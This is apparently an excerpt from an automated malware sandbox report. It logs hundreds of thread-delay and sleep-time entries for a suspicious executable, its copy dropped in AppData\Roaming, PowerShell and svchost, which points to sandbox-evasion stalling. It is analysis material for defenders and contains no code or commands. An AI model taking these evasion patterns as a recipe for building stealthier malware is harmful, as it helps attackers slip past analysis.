            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599198Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598859Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598750Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597318Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597120Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596891Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596563Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596438Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596313Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596188Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595969Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594975Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594402Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594281Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594172Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594063Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 593953Jump to behavior
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 600000
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599820
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599702
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599593
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599484
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599375
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599266
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599155
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 599047
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598938
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598813
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598688
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598563
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598453
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598344
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598219
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 598110
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 597985
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 597860
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 597735
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 597610
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 597485
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 597117
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 597000
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596891
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596766
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596654
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596547
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596438
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596313
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596188
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 596078
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595969
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595844
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595732
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595625
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595516
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595406
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595297
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595180
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 595063
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594953
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594844
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594719
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594609
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594500
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594391
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594281
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594170
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeThread delayed: delay time: 594063
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7300Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1638Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6913Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1012Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeWindow / User API: threadDelayed 3797Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeWindow / User API: threadDelayed 6038Jump to behavior
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeWindow / User API: threadDelayed 3092
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeWindow / User API: threadDelayed 6746
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7724Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep count: 7300 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep count: 1638 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4812Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 8156Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 2940Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -32281802128991695s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7592Thread sleep count: 3797 > 30Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7592Thread sleep count: 6038 > 30Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -599198s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -599078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -598969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -598859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -598750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -598641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -598531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -598422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -598313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -598203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -598094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -597969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -597860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -597735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -597485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -597318s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -597120s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -597000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -596891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -596781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -596672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -596563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -596438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -596313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -596188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -596078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -595969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -595844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -595735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -595610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -595485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -595360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -594975s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -594750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -594578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -594402s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -594281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -594172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -594063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exe TID: 7560Thread sleep time: -593953s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7476Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep count: 36 > 30
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -33204139332677172s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7868Thread sleep count: 3092 > 30
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -599820s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7868Thread sleep count: 6746 > 30
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -599702s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -599593s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -599484s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -599375s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -599266s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -599155s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -599047s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -598938s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -598813s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -598688s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -598563s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -598453s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -598344s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -598219s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -598110s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -597985s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -597860s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -597735s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -597610s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -597485s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -597117s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -597000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -596891s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -596766s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -596654s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -596547s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -596438s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -596313s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -596188s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -596078s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -595969s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -595844s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -595732s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -595625s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -595516s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -595406s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -595297s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -595180s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -595063s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -594953s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -594844s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -594719s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -594609s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -594500s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -594391s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -594281s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -594170s >= -30000s
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exe TID: 7872Thread sleep time: -594063s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599198Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598859Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598750Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597318Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597120Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 597000Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596891Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596563Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596438Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596313Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596188Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595969Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeThread delayed: delay time: 594975Jump to behavior
